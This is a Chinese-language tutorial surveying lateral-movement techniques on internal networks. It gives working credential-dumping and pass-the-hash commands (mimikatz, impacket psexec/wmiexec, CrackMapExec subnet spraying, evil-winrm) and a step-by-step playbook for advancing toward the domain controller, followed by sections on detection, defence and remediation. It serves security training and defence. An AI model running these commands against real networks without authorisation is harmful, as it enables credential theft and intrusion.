内网横向移动技术全景

内网横向移动全技术矩阵:SMB/WMI/WinRM/RDP/SSH/计划任务/服务、凭据类型(明文/哈希/票据)、工具与检测防御。

写在前面:合法学习边界

横向移动只允许在授权内网进行。对非授权主机横向、抓凭据可能触犯法律。

一、横向移动的本质

拿到一台主机后,用它的身份/凭据去“串”到内网其他主机,扩大控制面。

1
2
3
4
关键三要素:
1. 有凭据(明文/哈希/票据/Token)
2. 目标开放对应服务(445/5985/3389/22…)
3. 目标账号有权限
内网横向移动路径图

二、横向移动的凭据来源

1
2
3
4
5
内存抓取:mimikatz sekurlsa::logonpasswords
哈希:NTLM 哈希(PtH)
票据:Kerberos 票据(PtT / 黄金/白银票据)
明文:WDigest、内存缓存、配置文件
账号密码:弱口令爆破

三、横向技术矩阵

1. SMB 横向(最常用)

1
2
3
4
5
6
7
8
# impacket(Linux 侧)
psexec.py DOMAIN/user@ip -hashes :<ntlm>       # 交互 Shell
# 解释:通过 SMB 服务创建一个远程会话,-hashes 直接传 NTLM 哈希,无需明文密码
smbexec.py DOMAIN/user@ip -hashes :<ntlm>       # 无盘 Shell
# 解释:不走磁盘,通过 SMB 在内存中执行,更隐蔽
crackmapexec smb 网段 -u user -H <hash>          # 批量探测
# 解释:对网段批量测试哪些机器能用该哈希登录,[+] 即成功
# 工具:PsExec、CrackMapExec、Impacket

2. WMI 横向

1
2
3
wmiexec.py DOMAIN/user@ip -hashes :<ntlm>        # 更隐蔽
# 解释:通过 WMI 远程执行命令,不落地文件,日志更少
# 特点:不落地文件,走 WMI 远程执行

3. WinRM 横向

1
2
3
evil-winrm -i ip -u user -H <ntlm>               # 交互 Shell
# 解释:通过 WinRM(5985) 拿到交互 shell,适合支持 WinRM 的主机
# 前提:目标开启 WinRM(5985/5986)

4. RDP 横向

1
2
拿到账号密码/哈希直接远程桌面
注意:RDP 留登录痕迹,动静大

5. SSH 横向(Linux 内网)

1
2
ssh user@ip
# 复用已抓到的 SSH 私钥/口令

6. 计划任务 / 服务

1
2
创建远程计划任务执行命令
远程创建服务(binPath 指向恶意程序)

7. 其他

1
2
3
数据库横向(MSSQL xp_cmdshell / Redis)
Web 应用横向(利用内网 Web 漏洞)
代理 + 隧道(先打通网络再横向)

横向操作步骤

1
2
3
4
5
6
第 1 步:在已控主机抓凭据(mimikatz sekurlsa::logonpasswords)
第 2 步:确认网段与目标(存活探测 + 端口 445/5985/3389)
第 3 步:用 CrackMapExec 批量验证哈希/口令可用性
第 4 步:按服务选工具横向(SMB→psexec、WMI→wmiexec、WinRM→evil-winrm)
第 5 步:横向后在新主机再抓凭据,向域控/核心推进
第 6 步:全程记录,避免破坏业务

四、横向工具汇总

1
2
3
4
5
6
Impacket(psexec/wmiexec/smbexec)
CrackMapExec(批量横向)
evil-winrm
mimikatz(抓凭据)
Cobalt Strike 的 psexec_psh/wmi 模块
fscan(内网批量发现+利用)

五、检测

1
2
3
4
5
同一账号多主机登录(4624/4625 异常)
LSASS 被读取(mimikatz)
SMB/WMI/WinRM 横向扫描特征
计划任务/服务批量创建
异常 NTLM 登录、票据使用

六、防御

1
2
3
4
5
LAPS 防本地管理员密码复用
Credential Guard 隔离凭据
账号分离(域管不登普通机)
最小开放端口,网络分段
EDR 检测横向行为

七、修复(事件后)

1
2
3
4
重置受影响账号密码
清理会话/票据/后门
补齐补丁、收敛暴露面
复测横向路径是否还存在

八、小结

横向移动 = “凭据 + 可达服务 + 权限”。先抓凭据(mimikatz),再用 CrackMapExec/impacket 批量试,是主流打法。防守核心是防凭据泄露(LAPS/Credential Guard)+ 控横向通道(分段/EDR)